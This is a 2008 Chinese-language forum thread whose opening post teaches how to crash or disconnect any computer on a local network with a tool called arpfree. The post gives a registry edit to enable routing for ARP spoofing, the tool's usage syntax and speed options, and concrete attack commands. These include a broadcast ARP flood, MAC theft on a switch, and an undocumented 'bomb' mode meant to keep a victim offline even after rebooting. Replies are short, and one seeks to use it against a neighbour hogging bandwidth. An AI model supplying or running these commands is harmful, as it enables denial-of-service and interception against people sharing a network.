Board logo

标题: [交流] 教你让内网任何一台电脑死机 [打印本页]
作者: 觉醒    时间: 2008-6-5 02:06     标题: 教你让内网任何一台电脑死机

开始忘记说了,要使用ARP欺骗,必须启动ip路由功能,修改(添加)注册表选项:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友发现打开网卡失败,原因可能就是这个.

发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要问的IP地址

如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址

最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)

fast----------最快
hear---------每60MS一个包(可能是比较适合结合SNIFFER做监听)
slowhear---每500MS一个包
auto---------每1秒一个包
slow---------每2秒个包

使用方法如下:

***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************

补充:反击“LAN终结者”的办法:

反击“终结者”有几个办法:
1:发动比他更强烈的攻击:
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
这里是你想攻击的人的IP地址
2:交换机竞争:

arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
这里是你想攻击的人的MAC地址

1:情况将导致他IP地址冲突(比“终结者”来的猛烈多了)

2:情况将使得他无法连接网络(由于交换机把他的流量都给你了)
———————————更-----新----消-----息—————————————————————

因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击


增加参数“bomb”,使用方法如下:

假设,目标为IP:192.168.237.109 目标mac为:011a8575a436

攻击命令如下:

arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb



其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下

造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统

(当然前提是他没拔网线)。

其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面,大家慎用...

[ 本帖最后由 觉醒 于 2008-6-5 02:08 编辑 ]
作者: 87334433    时间: 2008-6-5 02:13

我想问下楼上的,你发这你对这了解吗?这就是ARP攻击,没必要这没麻烦,随便下个ARP的攻击软件就可以了
作者: xmtele    时间: 2008-6-5 16:35

问下楼上两位,搞那么复杂,我转个ARP防火墙,你们不都白忙了
作者: 一条火蛇    时间: 2008-6-5 23:22

好复杂呦,我还是别玩了,弄不好把自己的电脑整瞎喽
作者: purerain    时间: 2008-6-7 17:40

太复杂了,不过还是别玩了,我就是内网的,可不想死机
作者: zqlybh0    时间: 2008-6-8 21:31

很想对付内网里抢带宽的那位,好多软件都不行的,主要是进不了路由 ,怎么办。



欢迎光临 SiS001! Board - [第一会所 关闭注册] (http://67.220.91.16/bbs/) Powered by Discuz! 7.2